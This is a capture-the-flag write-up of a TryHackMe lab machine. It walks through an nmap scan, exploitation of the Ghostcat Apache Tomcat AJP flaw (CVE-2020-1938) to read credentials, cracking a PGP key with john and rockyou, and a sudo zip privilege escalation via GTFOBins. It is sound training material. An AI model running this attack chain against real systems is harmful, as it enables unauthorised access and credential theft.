Step 1 - Reconnaissance

First step is to enumerate the machine. A simple nmap scan will do it:

nmap -Pn -sV --script vulners <IP>

Nmap scan report for 10.10.170.7
Host is up (0.055s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open  http       Apache Tomcat 9.0.30
| vulners: 
|   cpe:/a:apache:tomcat:9.0.30: 
|_    	CVE-2020-1938	7.5	https://vulners.com/cve/CVE-2020-1938
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Step 2 - Web Exploitation

From the following Nmap scan, we can see that the box is vulnerable to CVE-2020-1938. Simple research revealed that this version of Apache Tomcat appears to be vulnerable to File Reading/Inclusion. The following exploit can allow us to read sensitive information, such as login credentials.

Article: nvd.nist.gov/vuln/detail/CVE-2020-1938 Exploit: exploit-db.com/exploits/48143

Download the exploit and run it using

python 48143.py <IP>

You should see a similar output:

Getting resource at ajp13://<IP>/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements.  See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License.  You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">

<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
[USERNAME:PASSWORD]
</description>

</web-app>

You should see the credentials at the end of the output.

Step 3 - User.txt

Use the following credentials to log into the machine via ssh. After that, you can immediately get user.txt by browsing to **/home** and visiting another user's directory.

Step 4 - Horizontal privilege escalation

Go back to the initial user's home folder and take a look at what we got there. We can see that there are exactly 2 files: **credential.pgp** and **tryhackme.asc**. As we can easily guess, those files will reveal us some credentials (most likely for the second user). A simple google search on PGP cracking led me to this article. This small guide tells us to crack the **.asc** file with john the ripper and then use it to open up the PGP.

Let's first convert the **.asc** file into a suitable format by running:

gpg2john tryhackme.asc > hash

Then, what we need to do is simply run a rockyou-powered cracking process on the **hash** file:

john hash --wordlist=/usr/share/wordlists/rockyou.txt

A password is going to be revealed in a couple of seconds and we can finally use it to open up the **.pgp** file. Run the following command and enter the password:

gpg --import tryhackme.asc

You can now easily open the PGP file after importing the key.

gpg --decrypt credential.pgp

Bingo! We got the credentials. Now let's ssh into the box and enumerate there.

Step 5 - Root

**sudo -l** reveals that we can run **/usr/bin/zip** as sudo. A given configuration is relatively famous and is covered by GTFOBins. Link: https://gtfobins.github.io/gtfobins/zip/#sudo

Let's follow the guide from GTFO and get the root shell!

Done! We now have root access and can finally read the **/root/root.txt**.

Thank you for reading!